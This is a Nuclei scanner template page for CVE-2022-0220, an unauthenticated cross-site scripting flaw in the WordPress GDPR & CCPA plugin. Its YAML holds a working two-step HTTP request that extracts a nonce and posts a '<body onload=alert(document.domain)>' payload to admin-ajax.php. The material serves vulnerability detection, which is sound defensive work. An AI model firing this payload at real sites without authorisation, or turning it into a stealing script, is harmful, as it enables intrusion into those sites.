Skip to content
Nuclei Templates

WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting

ID: CVE-2022-0220

Severity: medium

Author: daffainfo

Tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch

Description

Section titled “Description”

WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an “application/json” content-type, and JavaScript code may be executed on a victim’s browser.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0220


info:
  name: WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0220
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0220
    cwe-id: CWE-116
    epss-score: 0.00124
    epss-percentile: 0.4686
    cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: welaunch
    product: wordpress_gdpr\&ccpa
    framework: wordpress
  tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch


http:
  - raw:
      - |
        GET /wp-admin HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}


    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - "contains(header_2, 'text/html')"
          - "status_code_2 == 200"
          - "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
        condition: and


    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
        part: body
# digest: 4b0a00483046022100fa867b3f2227737315458d6d4c6be997aee06379143021fa0777debddb55eef90221009bc9c1d4589d37d89fdb991acc0a0126d0e6f7d4ca52759223326c2ece15e3e0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0220.yaml"

View on Github